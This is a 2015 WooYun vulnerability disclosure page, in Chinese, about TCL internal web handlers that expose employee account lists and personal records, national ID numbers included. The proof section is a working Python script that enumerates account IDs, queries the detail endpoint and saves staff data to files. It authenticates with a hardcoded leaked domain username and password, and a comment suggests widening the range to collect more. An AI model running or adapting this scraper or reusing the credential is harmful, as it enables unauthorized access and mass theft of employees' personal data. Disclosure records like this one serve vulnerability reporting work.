当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114931

漏洞标题:我是如何获得TCL高层的详细信息包含身份证号(附验证脚本)

相关厂商:TCL集团财务有限公司

漏洞作者: MyKings

提交时间:2015-05-19 14:08

修复时间:2015-05-24 14:10

公开时间:2015-05-24 14:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

员工的安全意识不足~

详细说明:

 WooYun: TCL内部信息泄露 
员工内部账号泄露


变换parentId的值可以遍历所有员工的AdAccount。


通过:http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx可以查询出员工的详细信息。


可以查到电话、毕业院校、学历、职位、部门、身份证(IDNo)等blabla...一堆东西。

漏洞证明:

#!/usr/bin/env python
# coding: utf-8
# pip install requests requests_ntlm
import re,sys,os,time
import requests
from requests_ntlm import HttpNtlmAuth
reload(sys)
sys.setdefaultencoding('utf-8')
AD_REGX = re.compile(r'AdAccount":"([^"]+?)"')
def get_account(start_num, end_num):
result_file = 'tcl_account.txt'
try:
with open(result_file, 'a') as f:
for id in xrange(start_num, end_num):
url = "http://epwf.tclcom.com/ashx/OUTreeViewHandler.ashx?parentId=%s" % str(id).zfill(8)
print url
json = get(url)
result = AD_REGX.search(json)
if result:
f.write('%s\n' % json)
except Exception,e:
result_file =None
print e.messgae
return result_file
def get_info(file_account):
if os.path.isfile(file_account):
with open(file_account, 'r') as f:
with open('tcl_info.txt', 'a') as info_f:
for line in f.readlines():
account_list = AD_REGX.findall(line)
for user in account_list:
url = 'http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx'
data = {'accountId':user.replace('\\\\','\\'), 'ApproverType':'0'}
print user
info = get(url, method='POST', data=data)
if info:
info_f.write('%s\n' % info)
def get(url, method='GET', data=None):
url = "%s" % url
result = ''
pagecount = 1
auth_nt = HttpNtlmAuth('TCT-HQ\\mingxiao.li', 'mobile#3')
if method == 'POST':
req = requests.post(url=url, auth=auth_nt, data=data)
else:
req = requests.get(url=url, auth=auth_nt)
if req.status_code == 200:
result = req.text
return result
if __name__ == '__main__':
result_account = get_account(100, 200) # 这里可以修改成100,888888,获得更多信息
if result_account:
get_info(result_account)

修复方案:

提高员工的安全意识

版权声明:转载请注明来源 MyKings@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-24 14:10

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-19 18:14 | T0ne5 ( 路人 | Rank:2 漏洞数:1 | 搬砖真的很累。)

    这么吊,看看有没有我的。